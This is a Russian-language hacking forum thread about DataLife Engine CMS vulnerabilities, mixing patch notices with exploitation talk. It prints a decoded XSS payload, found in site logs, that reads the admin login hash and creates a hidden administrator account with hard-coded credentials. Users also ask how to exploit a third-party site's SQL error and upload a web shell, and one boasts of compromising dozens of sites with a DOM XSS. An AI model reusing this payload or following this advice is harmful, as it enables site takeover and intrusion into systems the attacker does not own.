HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #371  
Старый 23.12.2016, 17:42
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Dr3DD  
Dr3DD said:

Есть определенный ресурс, на нем есть фотогалерея с возможностью поиска. При поиске
alert('xss') выбивает mysql error 1064. Как можно раскрутить ?

Скрин с содержанием error'a- http://clip2net.com/s/3FNfdVk

По идее можно, sqlmap пробуй
 
Ответить с цитированием

  #372  
Старый 26.12.2016, 01:26
Dr3DD
Guest
Сообщений: n/a
Провел на форуме:
1054

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  
karkajoi said:

По идее можно, sqlmap пробуй
Пробовал, не але... Есть еще варианты ?
 
Ответить с цитированием

  #373  
Старый 02.01.2017, 15:42
Zwer1992
Guest
Сообщений: n/a
Провел на форуме:
1072

Репутация: 0
По умолчанию

Цитата:
Сообщение от Dr3DD  
Dr3DD said:

Пробовал, не але... Есть еще варианты ?
Это дыра на многих сайтах есть или только на твоём?
 
Ответить с цитированием

  #374  
Старый 06.01.2017, 02:16
Dr3DD
Guest
Сообщений: n/a
Провел на форуме:
1054

Репутация: 0
По умолчанию

Цитата:
Сообщение от Zwer1992  
Zwer1992 said:

Это дыра на многих сайтах есть или только на твоём?
Других сайтов с данным модулем не находил... Модуль фотогаллерея от "Клуб Админов".
 
Ответить с цитированием

  #375  
Старый 06.03.2017, 18:10
airatos
Guest
Сообщений: n/a
Провел на форуме:
4003

Репутация: 0
По умолчанию

Новая уязвимость

Проблема:
Недостаточная фильтрация данных.

Ошибка в версии: 11.2 и ниже

Степень опасности: Высокая

Для исправления откройте файл: /engine/go.php и найдите:

Код:
Code:
$url = @str_replace ( "&", "&", $url );
ниже добавьте

Код:
Code:
$url = htmlspecialchars( $url, ENT_QUOTES, $config['charset'] );
$url = str_replace ( "&", "&", $url );
 
Ответить с цитированием

  #376  
Старый 07.03.2017, 19:16
pupsik13
Guest
Сообщений: n/a
Провел на форуме:
385

Репутация: 0
По умолчанию

Смотрел логи некоторых сайтов, после base64 decode вышло

[HTML]
HTML:
">

function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="petromadsss@gmail.com";
var objhttp=A();
objhttp.onreadystatechange = function()
{
if (objhttp.readyState == 4)
{
var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ 3wiKQ=='));
var da=r.exec(objhttp.responseText)[2];
r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoL is/KSgnfCIp'));
var dh=r.exec(objhttp.responseText)[2];
objhttp.open("POST",rp+da+'?mod=editusers&action=l ist',true);
objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
objhttp.send('action=adduser&user_hash='+dh+'&mod= editusers&regusername='+ul+'&regpassword='+up+'&re gemail='+um+'&reglevel=1');
var objhttp2=A();
objhttp2.onreadystatechange=function()
{
if(objhttp2.readyState==4)
{
var sd=document.getElementById('LJKwqoiDHqewE');
sd.innerHTML=objhttp2.responseText.replace(/(
 
Ответить с цитированием

  #377  
Старый 31.07.2017, 23:12
Leendesst
Guest
Сообщений: n/a
Провел на форуме:
13749

Репутация: 0
По умолчанию

Ребята, нужен способ заливки шелла, версия 10.5, форум стоит Xenforo 1.5.14. Может кто чего подскажет? Могу подкинуть Dom XSS, способ для личного пользования нужен)
 
Ответить с цитированием

  #378  
Старый 11.08.2017, 21:03
airatos
Guest
Сообщений: n/a
Провел на форуме:
4003

Репутация: 0
По умолчанию

Баг фикс

Проблема: Недостаточная фильтрация данных в Jquery плагине Masha JS входящем в состав DLE.

Ошибка в версии: 11.3 и ниже

Степень опасности: Высокая

Для исправления скачайте и скопируйте на свой сервер патч: https://dle-news.ru/files/dle113_path.zip

После чего очистите кеш браузера, и кеш скрипта в админпанели. Данный патч предназначен для версии 11.3 и всех версий ниже 11.3.
 
Ответить с цитированием

  #379  
Старый 11.08.2017, 21:04
airatos
Guest
Сообщений: n/a
Провел на форуме:
4003

Репутация: 0
По умолчанию

Кто знает как использовать этот баг с Masha JS?
 
Ответить с цитированием

  #380  
Старый 12.08.2017, 14:07
Leendesst
Guest
Сообщений: n/a
Провел на форуме:
13749

Репутация: 0
По умолчанию

Цитата:
Сообщение от airatos  
airatos said:

Кто знает как использовать этот баг с Masha JS?
Это и сесть моя DOM XSS. Я при помощи этой баги слил пару десятков сайтов. Она обходит даже xss аудитор от гугла ласт версии. Можно сделать сценарий на получение админ аккаунта.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Сценарии/CMF/СMS 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ